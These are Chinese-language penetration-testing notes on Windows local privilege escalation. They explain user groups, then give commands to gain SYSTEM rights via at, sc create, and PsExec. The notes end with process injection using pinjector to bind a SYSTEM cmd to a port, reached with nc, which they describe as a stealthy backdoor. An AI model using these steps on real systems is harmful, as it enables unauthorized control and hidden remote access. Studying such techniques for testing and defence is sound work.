渗透测试之简单本地提权
Administrators,管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以,只有受信任的人员才可成为该组的成员。
Users:普通用户组,这个组的用户无法进行有意或无意的改动。因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序。Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上,默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。
System:拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在察看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。
Linux系统用户权限划分
Users:普通用户
Root:管理员账号
windows系统下提权【可用命令行,也可用图形化界面】
net命令
#HelpAssistant:用于远程协助的账号;##SUPPORT——338945a0:用于支持
net user Xuan ##可查看当前账号信息
提权:【管理员权限提升为System权限】
1、at命令【at /?】##只能在XP与2003的系统上使用
at <time> /interactive cmd ##指定时间,使用交互命令防止在后台运行
###使用taskmgr命令杀死现用户桌面进程,重启,则整个界面都在管理员
则此时使用任何操作都是在System账号下
2、sc命令##可在win7、win8上使用【原理:创建一个服务(默认情况工作在system账号下)】
sc Create syscmd binPath= "cmd /K start" type= own type= interact【重启一个命令行窗口 类型为拥有】
默认情况下没启动
命令行下可用sc start syscmd
3、
windows系统有提供一个套件【搞windows系统的人都应该去学习该套件的使用】
https://technet.microsoft.com/en-us/sysinternals/bb545027 参考书籍:windows internals
###whoami插件,复制到C盘system32,运行
###PsExec.exe -i -s cmd 【-i交互模式,-s使用system账号】
4、注入进程提权【相当于开了一个后门,隐蔽性极高】
将进程注入system服务进程
pinjector.exe进程注入器
###pinjector.exe -l#查看可注入进程
###pinjector.exe -p <PID> cmd <ports>
nc -nv <IP> <ports>